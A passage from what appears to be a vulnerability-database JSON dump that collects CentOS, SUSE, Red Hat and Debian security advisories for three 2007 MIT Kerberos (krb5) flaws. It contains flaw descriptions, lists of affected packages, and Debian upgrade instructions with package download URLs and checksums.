of a target\r\nmachine could log in as root without requiring a password. (CVE-2007-0956)\r\n\r\nNote that the krb5 telnet daemon is not enabled by default in any version\r\nof Red Hat Enterprise Linux. In addition, the default firewall rules block\r\nremote access to the telnet port. This flaw does not affect the telnet\r\ndaemon distributed in the telnet-server package.\r\n\r\nFor users who have enabled the krb5 telnet daemon and have it accessible\r\nremotely, this update should be applied immediately. \r\n\r\nWhilst we are not aware at this time that the flaw is being actively\r\nexploited, we have confirmed that the flaw is very easily exploitable.\r\n\r\nThis update also fixes two additional security issues:\r\n\r\nBuffer overflows were found which affect the Kerberos KDC and the kadmin\r\nserver daemon. A remote attacker who can access the KDC could exploit this\r\nbug to run arbitrary code with the privileges of the KDC or kadmin server\r\nprocesses. (CVE-2007-0957)\r\n\r\nA double-free flaw was found in the GSSAPI library used by the kadmin\r\nserver daemon. Red Hat Enterprise Linux 4 and 5 contain checks within\r\nglibc that detect double-free flaws. Therefore, on Red Hat Enterprise Linux\r\n4 and 5 successful exploitation of this issue can only lead to a denial of\r\nservice. Applications which use this library in earlier releases of Red\r\nHat Enterprise Linux may also be affected. (CVE-2007-1216)\r\n\r\nAll users are advised to update to these erratum packages which contain a\r\nbackported fix to correct these issues.\r\n\r\nRed Hat would like to thank MIT and iDefense for reporting these\r\nvulnerabilities.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/025687.html\n\n**Affected packages:**\nkrb5-devel\nkrb5-libs\nkrb5-server\nkrb5-workstation\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 4, "modified": "2007-04-04T00:33:54", "published": "2007-04-04T00:33:54", "href": "http://lists.centos.org/pipermail/centos-announce/2007-April/025687.html", "id": "CESA-2007:0095-01", "title": "krb5 security update", "type": "centos", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:26:09", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "description": "**CentOS Errata and Security Advisory** CESA-2007:0095\n\n\nKerberos is a network authentication system which allows clients and\r\nservers to authenticate to each other through use of symmetric encryption\r\nand a trusted third party, the KDC.\r\n\r\nA flaw was found in the username handling of the MIT krb5 telnet daemon\r\n(telnetd). A remote attacker who can access the telnet port of a target\r\nmachine could log in as root without requiring a password. (CVE-2007-0956)\r\n\r\nNote that the krb5 telnet daemon is not enabled by default in any version\r\nof Red Hat Enterprise Linux. In addition, the default firewall rules block\r\nremote access to the telnet port. This flaw does not affect the telnet\r\ndaemon distributed in the telnet-server package.\r\n\r\nFor users who have enabled the krb5 telnet daemon and have it accessible\r\nremotely, this update should be applied immediately. \r\n\r\nWhilst we are not aware at this time that the flaw is being actively\r\nexploited, we have confirmed that the flaw is very easily exploitable.\r\n\r\nThis update also fixes two additional security issues:\r\n\r\nBuffer overflows were found which affect the Kerberos KDC and the kadmin\r\nserver daemon. A remote attacker who can access the KDC could exploit this\r\nbug to run arbitrary code with the privileges of the KDC or kadmin server\r\nprocesses. (CVE-2007-0957)\r\n\r\nA double-free flaw was found in the GSSAPI library used by the kadmin\r\nserver daemon. Red Hat Enterprise Linux 4 and 5 contain checks within\r\nglibc that detect double-free flaws. Therefore, on Red Hat Enterprise Linux\r\n4 and 5 successful exploitation of this issue can only lead to a denial of\r\nservice. Applications which use this library in earlier releases of Red\r\nHat Enterprise Linux may also be affected. (CVE-2007-1216)\r\n\r\nAll users are advised to update to these erratum packages which contain a\r\nbackported fix to correct these issues.\r\n\r\nRed Hat would like to thank MIT and iDefense for reporting these\r\nvulnerabilities.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/025676.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/025677.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/025680.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/025682.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/025683.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/025686.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/025694.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/025695.html\n\n**Affected packages:**\nkrb5\nkrb5-devel\nkrb5-libs\nkrb5-server\nkrb5-workstation\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0095.html", "edition": 4, "modified": "2007-04-06T17:43:39", "published": "2007-04-03T21:56:56", "href": "http://lists.centos.org/pipermail/centos-announce/2007-April/025676.html", "id": "CESA-2007:0095", "title": "krb5 security update", "type": "centos", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:50:13", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "description": "The krb5 telnet daemon allowed remote attackers to skip authentication and gain root access (CVE-2007-0956) A bug in the function krb5_klog_syslog() leads to a buffer overflow which could be exploited to execute arbitrary code (CVE-2007-0957). A double-free bug in the GSS-API library could crash kadmind. It's potentially also exploitable to execute arbitrary code (CVE-2007-1216).\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2007-04-05T12:20:17", "published": "2007-04-05T12:20:17", "id": "SUSE-SA:2007:025", "href": "http://lists.opensuse.org/opensuse-security-announce/2007-04/msg00006.html", "type": "suse", "title": "remote code execution in krb5", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:46:04", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "description": "Kerberos is a network authentication system which allows clients and\r\nservers to authenticate to each other through use of symmetric encryption\r\nand a trusted third party, the KDC.\r\n\r\nA flaw was found in the username handling of the MIT krb5 telnet daemon\r\n(telnetd). A remote attacker who can access the telnet port of a target\r\nmachine could log in as root without requiring a password. (CVE-2007-0956)\r\n\r\nNote that the krb5 telnet daemon is not enabled by default in any version\r\nof Red Hat Enterprise Linux. In addition, the default firewall rules block\r\nremote access to the telnet port. This flaw does not affect the telnet\r\ndaemon distributed in the telnet-server package.\r\n\r\nFor users who have enabled the krb5 telnet daemon and have it accessible\r\nremotely, this update should be applied immediately. \r\n\r\nWhilst we are not aware at this time that the flaw is being actively\r\nexploited, we have confirmed that the flaw is very easily exploitable.\r\n\r\nThis update also fixes two additional security issues:\r\n\r\nBuffer overflows were found which affect the Kerberos KDC and the kadmin\r\nserver daemon. A remote attacker who can access the KDC could exploit this\r\nbug to run arbitrary code with the privileges of the KDC or kadmin server\r\nprocesses. (CVE-2007-0957)\r\n\r\nA double-free flaw was found in the GSSAPI library used by the kadmin\r\nserver daemon. Red Hat Enterprise Linux 4 and 5 contain checks within\r\nglibc that detect double-free flaws. Therefore, on Red Hat Enterprise Linux\r\n4 and 5 successful exploitation of this issue can only lead to a denial of\r\nservice. Applications which use this library in earlier releases of Red\r\nHat Enterprise Linux may also be affected. (CVE-2007-1216)\r\n\r\nAll users are advised to update to these erratum packages which contain a\r\nbackported fix to correct these issues.\r\n\r\nRed Hat would like to thank MIT and iDefense for reporting these\r\nvulnerabilities.", "modified": "2019-03-22T23:42:36", "published": "2007-04-03T04:00:00", "id": "RHSA-2007:0095", "href": "https://access.redhat.com/errata/RHSA-2007:0095", "type": "redhat", "title": "(RHSA-2007:0095) Critical: krb5 security update", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:14:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1276-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nApril 3th, 2007 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : krb5\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2007-0956 CVE-2007-0957 CVE-2007-1216\n\nSeveral remote vulnerabilities have been discovered in the MIT reference\nimplementation of the Kerberos network authentication protocol suite,\nwhich may lead to the execution of arbitrary code. The Common \nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2007-0956\n\n It was discovered that the krb5 telnet daemon performs insufficient\n validation of usernames, which might allow unauthorized logins or\n privilege escalation.\n\nCVE-2007-0957\n\n iDefense discovered that a buffer overflow in the logging code of the\n KDC and the administration daemon might lead to arbitrary code\n execution.\n\nCVE-2007-1216\n\n It was discovered that a double free in the RPCSEC_GSS part of the \n GSS library code might lead to arbitrary code execution.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 1.3.6-2sarge4.\n\nFor the upcoming stable distribution (etch) these problems have been fixed\nin version 1.4.4-7etch1.\n\nFor the unstable distribution (sid) these problems will be fixed soon.\n\nWe recommend that you upgrade your Kerberos packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.3.6-2sarge4.dsc\n Size/MD5 checksum: 782 a4a9a2cff9292af1de210f83edcee281\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.3.6-2sarge4.diff.gz\n Size/MD5 checksum: 666048 006edbace85ee6fab561c8f5ba59914d\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.3.6.orig.tar.gz\n Size/MD5 checksum: 6526510 7974d0fc413802712998d5fc5eec2919\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-doc_1.3.6-2sarge4_all.deb\n Size/MD5 checksum: 718724 9bd56e8f5a673661416a042cc315509b\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 114882 0b1d6a3f226b48f3065f8e065049a02a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 247602 b36d6e32ae319ed6953327d0de0e091c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 62892 a96ce75c69cc4423f0922a49ce97b7ef\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 137006 6285c054dbb18b511153aeab6d5bb399\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 89654 491c88a0bea723021f0f1eda84450208\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 72142 3cad8d2db4270a422c0ba0ccfd6a9151\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 144782 dea1c0c916c80b59174b4cfd18f1eb5e\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 201754 42d6fcb995989672cfde30a467f9486e\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 860980 3dabb660978f0d3cfc2c121acf8a48de\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 422446 d1a9263aa8929f74016c05d576aee119\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 104412 e8745bef65a969fc66e85f2e05fc460c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 216804 6cac5d3359fd89e684da8020737d3bf5\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 56842 48564b65fede1322e806761578284afe\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 124622 63fdfbb8262a301fea57201abe745ccf\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 82604 9aa00994ff6db71ceea74e40774ec004\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 63404 9374de7ff3893edf7d15d59afe69014d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 137616 a3299d431fdeefc0a97cdf0dda8f0c32\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 177494 3343049ddfd8a6c6f92f72bb6d01236d\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 652190 4c662956e4fd6048718aafb636e86eb9\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 369222 2d5d91d193a1b9a974e94c7a6a285fa3\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 93246 da4123366ef29bedeb4c311b0a1a2126\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 192714 3f6ff7ed3a85692a519d42abd81eac0b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 53524 c3da0283dddf25e3b0c56ff8a96f4915\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 115350 cacaf8656e56b5d6b48cbebdb82e0867\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 74736 272dc94b86b09c30713f992eca1fe821\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 57966 ed7fb406f72392755271a6566c26f4a3\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 127322 c7e623470e20fe820f542f39f4153a92\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 158514 54ea5f70bf9670248228abac564f3789\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 633650 746035ffc674dda29c2d210cec2b1fb2\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 329018 361b300241f40c9ca6b19699e9a21808\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 104264 d76de2355f7087f0fb714f74df37ce8f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 223960 87e7ec87182ecdbfdf78cb8b671b4938\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 59164 e402fcaf185e9b71a8c22ed66360cc5c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 124948 17782c833aa2b3a5913e43486babdd75\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 81792 8abee5e8628ca43b28a9817b525e51e7\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 64084 833c24350b1da5c5ee344091b7326162\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 138992 1de0af508b0209ed74c55cf2360600d1\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 187080 a8e725187772da6af103407ddc837805\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 669466 df7019788a52698f5fca94b5a6b636d1\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 383676 3b3d54cdeff6e16d5999a77b05bdef56\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 95302 4ebb65f09a2813e7a87099683a76a936\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 191318 e84d322bdd6aa2880dfba7777b081afa\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 52708 25c09098ba171b5870e03138c3fb8c07\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 116110 00e1857255939453af3e38584e52d75d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 75686 21feee38a4073694deae7a94b7c74961\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 57572 57277b50a393a4b804f6e44e8fbed14c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 127714 424e2d5b62373d8d903b0610e1c096f1\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 165536 aba5e1342c5c0d993b45d79ba7733b93\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 574568 bcde4ee063fa9ad80072f9e60af18a48\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 349210 b5e0a23fa9d19709e2541d1247646c53\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 133654 bd3a80a682b7e2d0f49bea38add8b426\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 289234 47157a53b52eb93c0d887525abd3fe58\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 73454 bd64fc888c121da2bc69c596e49216eb\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 165084 526977361ce8f1d141ab6a0d4d57e11c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 105104 6c50a30d0b208f9e38324172041c4473\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 79786 d065a2fb8f537da0af521d39eb7f4686\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 167214 0072423f9707a6040e9ee4240014e26b\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 240194 ce4208e768989f5c2f4ca14a8e717143\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 889856 455bc01c17e013c07afaa6463cc4f94a\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 502200 75cf74775886ec0d713c7e7ff069eacd\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 88346 18046c57ad2f6d296e4546d20615d2c0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 173992 c6c7ca503f6cbf8e7ed89efdd553f06c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 49570 d1e0e9469cb6b463125de79f3a76a833\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 107426 92711b4028325787ece8018089244f85\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 70924 946c93da54740dcd2200d87b60be99cd\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 53268 505c5f0e7082216305e047ac76acc2e0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 121914 f3412080c6c058538a1da06a7f379fa5\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 147644 212a5def1b0f371be806a47ba5e14da7\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 515768 ab442500a068df4ae71a7cad9172381b\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 305692 0b36bd762b51f0ea9870cfc093a17fa7\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 103118 c5911de1a7b6faaaaea463e42cb6ca37\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 226616 d71a001774ff8acedc64d619fbb129b2\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 57958 7618bb356ce7a5d2e884a717b671e045\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 129168 72c873bb4b1772a1dde04cf452bf204e\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 81578 09ffcb6dd51efa8554efd45e802c709f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 65290 eb9453f215ecac2960954dfb8ca5c79b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 146674 2b1eac4315d219561a3c2322716c3e58\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 163958 eda48e4e6a6eea35ed81f2eea1e41383\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 679868 eb43a541790a82e14df96703ddc48d5d\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 355200 49b45ff31e6a7a20f4198871a33f8697\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 103366 e814978c4614f069f9904e9e690779b3\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 226340 ca1e35633c18a80b74fb5ba99066523b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 57978 2bac56dae5d980b9e98ae015e7c20ea7\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 129948 c3e08687a0cd77db3b11acda86e053b9\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 81854 1e23c8b5144202406c755e2b73c760aa\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 65060 916ea871ff1977c2293a56d79dc4e840\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 146468 4352c5843806234a3736827084ba12e6\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 165420 e8841b6a943bb8a2dc50d3a12f08b097\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 682572 8c4f8624982d503b058096e4e6ae7732\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 354934 966ebdd40dd7f25e940f5f365bb8de1d\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 104928 6c5055b15dc847aede18f1896766226b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 217626 e50b4eab8968309b0e2dc9c6fa536ea4\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 56816 3bd00f6e9313eb2dc1bae0cb72c31374\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 126050 b3daca5ae9279e9963ff34b7a8fc7270\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 82508 b9ff1fc4d5224d60f586b33064e19abe\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 61544 2dc54082294e8b2d49d576e44ecde30c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 143612 e63a590b4b19bb4d44f8ddf5b514ef3a\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 165530 03b169581afdb74b8cb6bc925bc12772\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 634694 b2f19d9a57a559ef0db1f04d88a00663\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_powerpc.deb\n Size/MD5 checksum: 352904 550389ef5277b0b5c9cc76516d000603\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 99046 9c7e32c8053aa12e89da6175316a29e1\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 213978 0fba5ba506e53561e622d85640e9de08\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 57014 6c07850bfe519001f333bbf3593c9e69\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 121124 171d72893437cfdc361566d95185339a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 82164 b4b307da992d6ac9a7db82b842c7a29a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 63222 2c820c0093d341f2849e3ccd2dc47576\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 132766 54039c0ea9d55b92252729b63a9e9c5f\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 180106 d990b1ca5fb8ad1c695974fc1f2960b9\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_s390.deb\n Size/MD5 checksum: 624734 c4a3211cf0cccef1b64bddc37d8d03f3\n 